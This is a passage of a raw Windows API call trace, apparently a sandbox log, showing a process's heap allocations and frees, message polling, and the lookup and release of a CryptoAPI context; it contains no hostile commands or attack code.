lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0245.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.965] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.965] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0245.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0245.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.965] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0245.967] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.967] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.967] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0245.967] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.968] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.969] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0245.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0245.971] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.972] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0245.973] HeapFree (in: hHeap=0x970000, 